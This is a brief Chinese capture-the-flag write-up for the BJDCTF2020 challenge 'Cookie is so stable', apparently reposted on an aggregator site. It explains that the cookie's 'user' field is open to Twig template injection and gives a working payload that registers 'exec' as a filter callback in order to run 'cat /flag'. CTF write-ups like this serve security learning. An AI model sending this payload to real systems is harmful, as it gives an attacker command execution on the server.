[BJDCTF2020]Cookie is so stable

其他 2020-02-19 12:00:59 阅读次数: 0

0x00 知识点

Twig模板注入
链接:

https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/#2-Twig

0x01 解题

测试一下发现*wig模板注入

找注入点:
根据提示,cookie中的user是注入点

payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};

猜你喜欢

转载自www.cnblogs.com/wangtanzhi/p/12330542.html
今日推荐
PHP 8.3 GA
支持分组、搜索、批量登录的轻量 ssh 客户端发布 v0.1.14
Spring Modulith 1.1 GA & 1.0.3 发布
RuoYi-Vue-Plus 发布 4.8.2 正式进入维护状态
jsoup 1.17.1 发布,Java HTML 解析器
MyCms v4.8 快捷生成接口,即将推出免费小程序
RuoYi-Cloud-Plus 发布 1.8.2 正式进入维护状态
FreeFileSync 13.2 发布,文件夹比较与同步软件
GNOME 拿到 100 万欧元投资后,积极改进基础设施
Firefox 121 默认启用 Wayland 支持
Visual Studio 的中一键打开当前代码 Gitee.com 的 Web 页面
Firefox 在 2023 变得更快了
周排行
Android快速开发框架,基础库,样式库,组件化,组件集成
C++ 位域(Bit Fields)
微信小程序--动画
java 数据类型与运算符
野路子学习esp32(七) 新建一个应用@a.宏万
简易hadoop三节点集群搭建总结
LeetCode 19.Remove Nth Node From End of List
windows 8 64bit 离线官安装 .net framework 3.5
Spring Boot国际化实现及配置文件路径设置避坑指南
互联网公司防御DDOS的技术选型漫谈
每日归档
更多
2023-11-27(63)
2023-11-26(0)
2023-11-25(24)
2023-11-24(72)
2023-11-23(0)
2023-11-22(90)
2023-11-21(131)
2023-11-20(0)
2023-11-19(0)
2023-11-18(17)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022